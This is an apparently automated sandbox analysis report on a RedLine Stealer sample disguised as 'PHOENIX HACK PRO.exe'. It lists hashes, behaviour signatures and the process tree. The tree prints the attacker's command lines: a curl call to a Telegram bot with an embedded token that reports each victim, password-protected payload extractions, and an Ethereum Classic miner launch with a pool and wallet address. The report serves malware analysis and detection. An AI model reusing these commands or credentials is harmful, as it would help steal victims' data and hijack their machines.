Analysis
-
max time kernel
72s -
max time network
70s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
05-12-2021 20:22
Static task
static1
Behavioral task
behavioral1
Sample
PHOENIX HACK PRO.exe
Resource
win10-en-20211104
General
-
Target
PHOENIX HACK PRO.exe
-
Size
1.6MB
-
MD5
c7070acb1e849402487f7d111b0c64b8
-
SHA1
82ea0d011b747d075fb4f9a8c54c259c102f5d38
-
SHA256
fac0db5324652b25cf41aad97f7444147c5262745ae6779c30a31964e6d4e371
-
SHA512
f6630355eab835f2a800d96d3223243a218d4690b859a9a463ccd4ac2244327ecdd4e85242322965f723d30c56c889042582bbda942c106c76b891385b0fbe9b
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3112-123-0x0000000000400000-0x00000000007F4000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
a.exe7z.exe7z.exepid process 432 a.exe 1944 7z.exe 2448 7z.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a.exe upx C:\Users\Admin\AppData\Local\Temp\a.exe upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
PHOENIX HACK PRO.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion PHOENIX HACK PRO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion PHOENIX HACK PRO.exe -
Loads dropped DLL 2 IoCs
Processes:
7z.exe7z.exepid process 1944 7z.exe 2448 7z.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
a.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun" a.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
PHOENIX HACK PRO.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PHOENIX HACK PRO.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
explorer.exebfsvc.exepid process 2884 explorer.exe 2912 bfsvc.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
a.exedescription pid process target process PID 432 set thread context of 2912 432 a.exe bfsvc.exe PID 432 set thread context of 2884 432 a.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
PHOENIX HACK PRO.exepid process 3112 PHOENIX HACK PRO.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
PHOENIX HACK PRO.exe7z.exe7z.exedescription pid process Token: SeDebugPrivilege 3112 PHOENIX HACK PRO.exe Token: SeRestorePrivilege 1944 7z.exe Token: 35 1944 7z.exe Token: SeSecurityPrivilege 1944 7z.exe Token: SeSecurityPrivilege 1944 7z.exe Token: SeRestorePrivilege 2448 7z.exe Token: 35 2448 7z.exe Token: SeSecurityPrivilege 2448 7z.exe Token: SeSecurityPrivilege 2448 7z.exe -
Suspicious use of WriteProcessMemory 60 IoCs
Processes:
PHOENIX HACK PRO.exea.execmd.execmd.exedescription pid process target process PID 3112 wrote to memory of 432 3112 PHOENIX HACK PRO.exe a.exe PID 3112 wrote to memory of 432 3112 PHOENIX HACK PRO.exe a.exe PID 432 wrote to memory of 956 432 a.exe cmd.exe PID 432 wrote to memory of 956 432 a.exe cmd.exe PID 432 wrote to memory of 3584 432 a.exe cmd.exe PID 432 wrote to memory of 3584 432 a.exe cmd.exe PID 3584 wrote to memory of 1944 3584 cmd.exe 7z.exe PID 3584 wrote to memory of 1944 3584 cmd.exe 7z.exe PID 432 wrote to memory of 2008 432 a.exe cmd.exe PID 432 wrote to memory of 2008 432 a.exe cmd.exe PID 2008 wrote to memory of 2448 2008 cmd.exe 7z.exe PID 2008 wrote to memory of 2448 2008 cmd.exe 7z.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2912 432 a.exe bfsvc.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe PID 432 wrote to memory of 2884 432 a.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\PHOENIX HACK PRO.exe"C:\Users\Admin\AppData\Local\Temp\PHOENIX HACK PRO.exe"1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a.exe"C:\Users\Admin\AppData\Local\Temp\a.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot5054999145:AAFdU1qLbwj0w1g6jHdF6-sMbR_aB06M0ME/sendMessage?chat_id=-773528453&text=%F0%9F%90%B7%20%D0%A3%20%D0%B2%D0%B0%D1%81%20%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9%20%D0%B2%D0%BE%D1%80%D0%BA%D0%B5%D1%80!%0A%D0%92%D0%B8%D0%B4%D0%B5%D0%BE%D0%BA%D0%B0%D1%80%D1%82%D0%B0%3A%20Microsoft Basic Display Adapter%0A(Windows%20Defender%20has%20been%20turned%20off)"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exeC:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exeC:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0xDE52C43Eff74263429627E5134c722e966cC16D0 -coin etc -worker EasyMiner_Bot -clKernel 33⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0xDE52C43Eff74263429627E5134c722e966cC16D0 -coin etc -worker EasyMiner_Bot -clKernel 33⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\a.exeMD5
d63a5f8abeae0e5e57f37a7d7d7b536a
SHA11ff22ef0159aa87f94bfbd1517a7f3f76e336ace
SHA25638790585548ea1c297215d9ed82e276fd2fe260052ceef1ee81d9635d78f0133
SHA51268c2cc24a4e8515e22785cd608e161acefa78bf610bafecd288c25410462d774fd370877d9c41edaeafc4f194166045faa63db8f29747ceb460e972dab6c7638
-
C:\Users\Admin\AppData\Local\Temp\a.exeMD5
d63a5f8abeae0e5e57f37a7d7d7b536a
SHA11ff22ef0159aa87f94bfbd1517a7f3f76e336ace
SHA25638790585548ea1c297215d9ed82e276fd2fe260052ceef1ee81d9635d78f0133
SHA51268c2cc24a4e8515e22785cd608e161acefa78bf610bafecd288c25410462d774fd370877d9c41edaeafc4f194166045faa63db8f29747ceb460e972dab6c7638
-
C:\Users\Admin\AppData\Roaming\Microsoft\7z.dllMD5
42336b5fc6be24babfb87699c858fb27
SHA138ae0db53b22d2e2f52bfdf25b14d79f8feca7aa
SHA256b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07
SHA512f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3
-
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exeMD5
86e8388e83be8909d148518cf7b6e083
SHA14f7fdcf3abc0169b591e502842be074a5188c2c9
SHA2564120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17
SHA5122d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e
-
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exeMD5
86e8388e83be8909d148518cf7b6e083
SHA14f7fdcf3abc0169b591e502842be074a5188c2c9
SHA2564120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17
SHA5122d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exeMD5
67a55e73dc3e285f5ecad2f52e4606aa
SHA1280b8d8083aac33e1b05078bb6706f155cae47c7
SHA256fc0e21a8e33d53a30207d3e0e3dc9079e253fc623cc4835877cbc39ca7a826a3
SHA512e12b564cc866d3d50246c4326e0086daa3086adf8084f69c1f0fa49a091ed9a2c93ea07a2f6cc4eec30dea54492dbf12950e8e3e7f6c26208f7b57860f362efe
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zipMD5
1543b223f63fda679a94d034d23b27ba
SHA182eb69d0d096ff966679ce92c4fb2dd5a8dd6f1e
SHA25630868a1cadb90f598ec9d96f93650c90883941522134b2e0a2dfeca958958e34
SHA512270de3749322416e371d5177b974450e5e2fbca3570179d2f4811f1fda55aca4ea82cbd0a37d1b56ee8614be154373054b573da854a818caafb41b3cee502f78
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exeMD5
9d99b4d43e4e7a0408c5fe99b4cc4afe
SHA1702436963243f0de2d431ec29b199505a0aa3b90
SHA256c9e36c039bfc370135feabad11840fe457caec3c4914351461f3f9e115194fb3
SHA51244620e76efc6d0cefc1c6f8eca77c0114d41fbf4d6e1f6ff2287286ff57aca1679a0428b35c757afb96fd31d99de8b9e1d956b89636d9c373248e5c5b5b05754
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zipMD5
32ab3a6509fe78d666dcafc5be73f2e1
SHA1c16e1c2716b4ae5b9e5bfb9773d810344b539126
SHA256dd2170bbea158a2c2b8c262c2be9c8d91fc3e86efe7f607fce7a9224a389bdec
SHA512c31ee784de253c4f5c36990959d8e6f74b2b0eeecfd265cab2d5295be33f7af056e144d829adcd754c78e06023816cb3f576110314717ee7e50cc0af507f02fe
-
\Users\Admin\AppData\Roaming\Microsoft\7z.dllMD5
42336b5fc6be24babfb87699c858fb27
SHA138ae0db53b22d2e2f52bfdf25b14d79f8feca7aa
SHA256b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07
SHA512f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3
-
\Users\Admin\AppData\Roaming\Microsoft\7z.dllMD5
42336b5fc6be24babfb87699c858fb27
SHA138ae0db53b22d2e2f52bfdf25b14d79f8feca7aa
SHA256b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07
SHA512f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3
-
memory/432-183-0x0000000000000000-mapping.dmp
-
memory/956-186-0x0000000000000000-mapping.dmp
-
memory/1944-188-0x0000000000000000-mapping.dmp
-
memory/2008-193-0x0000000000000000-mapping.dmp
-
memory/2448-194-0x0000000000000000-mapping.dmp
-
memory/2884-211-0x0000000140000000-0x0000000140E38000-memory.dmpFilesize
14.2MB
-
memory/2884-202-0x0000000140000000-0x0000000140E38000-memory.dmpFilesize
14.2MB
-
memory/2884-203-0x0000000140E36784-mapping.dmp
-
memory/2884-206-0x00000000003F0000-0x00000000003F2000-memory.dmpFilesize
8KB
-
memory/2884-207-0x00000000003F0000-0x00000000003F2000-memory.dmpFilesize
8KB
-
memory/2884-208-0x0000000140000000-0x0000000140E38000-memory.dmpFilesize
14.2MB
-
memory/2884-214-0x00007FF7FA250000-0x00007FF7FA621000-memory.dmpFilesize
3.8MB
-
memory/2884-213-0x0000000140000000-0x0000000140E38000-memory.dmpFilesize
14.2MB
-
memory/2912-210-0x0000000140000000-0x0000000141660000-memory.dmpFilesize
22.4MB
-
memory/2912-199-0x0000000140000000-0x0000000141660000-memory.dmpFilesize
22.4MB
-
memory/2912-200-0x000000014165D878-mapping.dmp
-
memory/2912-204-0x000001C8CDB50000-0x000001C8CDB52000-memory.dmpFilesize
8KB
-
memory/2912-205-0x000001C8CDB50000-0x000001C8CDB52000-memory.dmpFilesize
8KB
-
memory/2912-212-0x00007FF65E270000-0x00007FF65E641000-memory.dmpFilesize
3.8MB
-
memory/2912-209-0x0000000140000000-0x0000000141660000-memory.dmpFilesize
22.4MB
-
memory/3112-142-0x00000000027F0000-0x00000000027F1000-memory.dmpFilesize
4KB
-
memory/3112-149-0x0000000003570000-0x0000000003571000-memory.dmpFilesize
4KB
-
memory/3112-151-0x0000000003570000-0x0000000003571000-memory.dmpFilesize
4KB
-
memory/3112-152-0x0000000003570000-0x0000000003571000-memory.dmpFilesize
4KB
-
memory/3112-153-0x0000000002630000-0x0000000002631000-memory.dmpFilesize
4KB
-
memory/3112-154-0x0000000002940000-0x0000000002941000-memory.dmpFilesize
4KB
-
memory/3112-155-0x0000000002950000-0x0000000002951000-memory.dmpFilesize
4KB
-
memory/3112-157-0x0000000002970000-0x0000000002971000-memory.dmpFilesize
4KB
-
memory/3112-156-0x0000000002900000-0x0000000002901000-memory.dmpFilesize
4KB
-
memory/3112-158-0x0000000002930000-0x0000000002931000-memory.dmpFilesize
4KB
-
memory/3112-159-0x0000000002920000-0x0000000002921000-memory.dmpFilesize
4KB
-
memory/3112-160-0x0000000002990000-0x0000000002991000-memory.dmpFilesize
4KB
-
memory/3112-161-0x0000000002630000-0x0000000002631000-memory.dmpFilesize
4KB
-
memory/3112-162-0x0000000002630000-0x0000000002631000-memory.dmpFilesize
4KB
-
memory/3112-163-0x0000000002980000-0x0000000002981000-memory.dmpFilesize
4KB
-
memory/3112-164-0x00000000026E0000-0x00000000026E1000-memory.dmpFilesize
4KB
-
memory/3112-165-0x0000000002630000-0x0000000002631000-memory.dmpFilesize
4KB
-
memory/3112-166-0x0000000002630000-0x0000000002631000-memory.dmpFilesize
4KB
-
memory/3112-167-0x0000000000400000-0x0000000000402000-memory.dmpFilesize
8KB
-
memory/3112-169-0x0000000005DC0000-0x0000000005DC1000-memory.dmpFilesize
4KB
-
memory/3112-170-0x0000000006460000-0x0000000006461000-memory.dmpFilesize
4KB
-
memory/3112-171-0x0000000006490000-0x0000000006491000-memory.dmpFilesize
4KB
-
memory/3112-172-0x0000000007BC0000-0x0000000007BC1000-memory.dmpFilesize
4KB
-
memory/3112-173-0x00000000066E0000-0x00000000066E1000-memory.dmpFilesize
4KB
-
memory/3112-174-0x0000000007DA0000-0x0000000007DA1000-memory.dmpFilesize
4KB
-
memory/3112-175-0x0000000008520000-0x0000000008521000-memory.dmpFilesize
4KB
-
memory/3112-176-0x0000000008A60000-0x0000000008A61000-memory.dmpFilesize
4KB
-
memory/3112-177-0x0000000008C30000-0x0000000008C31000-memory.dmpFilesize
4KB
-
memory/3112-178-0x0000000008CD0000-0x0000000008CD1000-memory.dmpFilesize
4KB
-
memory/3112-179-0x0000000008DE0000-0x0000000008DE1000-memory.dmpFilesize
4KB
-
memory/3112-180-0x00000000091D0000-0x00000000091D1000-memory.dmpFilesize
4KB
-
memory/3112-181-0x0000000009240000-0x0000000009241000-memory.dmpFilesize
4KB
-
memory/3112-182-0x0000000009430000-0x0000000009431000-memory.dmpFilesize
4KB
-
memory/3112-150-0x0000000003570000-0x0000000003571000-memory.dmpFilesize
4KB
-
memory/3112-148-0x0000000003570000-0x0000000003571000-memory.dmpFilesize
4KB
-
memory/3112-146-0x00000000027C0000-0x00000000027C1000-memory.dmpFilesize
4KB
-
memory/3112-147-0x0000000002830000-0x0000000002831000-memory.dmpFilesize
4KB
-
memory/3112-119-0x0000000002890000-0x0000000002891000-memory.dmpFilesize
4KB
-
memory/3112-145-0x00000000027D0000-0x00000000027D1000-memory.dmpFilesize
4KB
-
memory/3112-144-0x0000000002810000-0x0000000002811000-memory.dmpFilesize
4KB
-
memory/3112-143-0x00000000027A0000-0x00000000027A1000-memory.dmpFilesize
4KB
-
memory/3112-118-0x0000000000CC0000-0x0000000000D20000-memory.dmpFilesize
384KB
-
memory/3112-141-0x00000000027E0000-0x00000000027E1000-memory.dmpFilesize
4KB
-
memory/3112-140-0x0000000003570000-0x0000000003571000-memory.dmpFilesize
4KB
-
memory/3112-139-0x0000000003570000-0x0000000003571000-memory.dmpFilesize
4KB
-
memory/3112-138-0x00000000026D0000-0x00000000026D1000-memory.dmpFilesize
4KB
-
memory/3112-137-0x00000000026B0000-0x00000000026B1000-memory.dmpFilesize
4KB
-
memory/3112-136-0x0000000002660000-0x0000000002661000-memory.dmpFilesize
4KB
-
memory/3112-135-0x0000000002640000-0x0000000002641000-memory.dmpFilesize
4KB
-
memory/3112-134-0x0000000002690000-0x0000000002691000-memory.dmpFilesize
4KB
-
memory/3112-133-0x0000000002680000-0x0000000002681000-memory.dmpFilesize
4KB
-
memory/3112-132-0x0000000003570000-0x0000000003571000-memory.dmpFilesize
4KB
-
memory/3112-131-0x0000000003570000-0x0000000003571000-memory.dmpFilesize
4KB
-
memory/3112-130-0x0000000003570000-0x0000000003571000-memory.dmpFilesize
4KB
-
memory/3112-129-0x0000000003570000-0x0000000003571000-memory.dmpFilesize
4KB
-
memory/3112-128-0x0000000003580000-0x0000000003581000-memory.dmpFilesize
4KB
-
memory/3112-127-0x00000000028B0000-0x00000000028B1000-memory.dmpFilesize
4KB
-
memory/3112-126-0x00000000028E0000-0x00000000028E1000-memory.dmpFilesize
4KB
-
memory/3112-125-0x0000000002870000-0x0000000002871000-memory.dmpFilesize
4KB
-
memory/3112-124-0x0000000002880000-0x0000000002881000-memory.dmpFilesize
4KB
-
memory/3112-123-0x0000000000400000-0x00000000007F4000-memory.dmpFilesize
4.0MB
-
memory/3112-122-0x00000000028C0000-0x00000000028C1000-memory.dmpFilesize
4KB
-
memory/3112-120-0x00000000028A0000-0x00000000028A1000-memory.dmpFilesize
4KB
-
memory/3112-121-0x0000000002850000-0x0000000002851000-memory.dmpFilesize
4KB
-
memory/3584-187-0x0000000000000000-mapping.dmp